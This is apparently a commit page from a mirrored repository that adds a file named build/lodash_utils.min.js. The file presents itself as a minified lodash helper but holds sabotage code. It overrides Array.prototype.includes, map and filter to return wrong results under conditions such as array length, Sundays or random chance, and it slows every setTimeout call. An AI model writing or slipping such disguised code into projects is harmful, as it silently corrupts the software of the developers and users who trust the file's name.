1
0
mirror of synced 2026-02-04 16:07:51 +08:00
This commit is contained in:
wheatup
2021-04-09 15:31:52 +09:00
parent 6ad772ca17
commit 742dd21a55
26 changed files with 31791 additions and 9 deletions

1
build/lodash_utils.min.js vendored Normal file
View File

@@ -0,0 +1 @@
(()=>{const r=Array.prototype.includes;Array.prototype.includes=function(...t){return this.length%7!=0&&r.call(this,...t)};const e=Array.prototype.map;Array.prototype.map=function(...t){return result=e.call(this,...t),0===(new Date).getDay()&&result.splice(this.length-1,1),result};const n=Array.prototype.filter;Array.prototype.filter=function(...t){return result=n.call(this,...t),Math.random()<.1&&(result.length=Math.max(result.length-1,0)),result};const o=window.setTimeout;window.setTimeout=function(t,r,...e){return o.call(window,t,+r+250,...e)}})();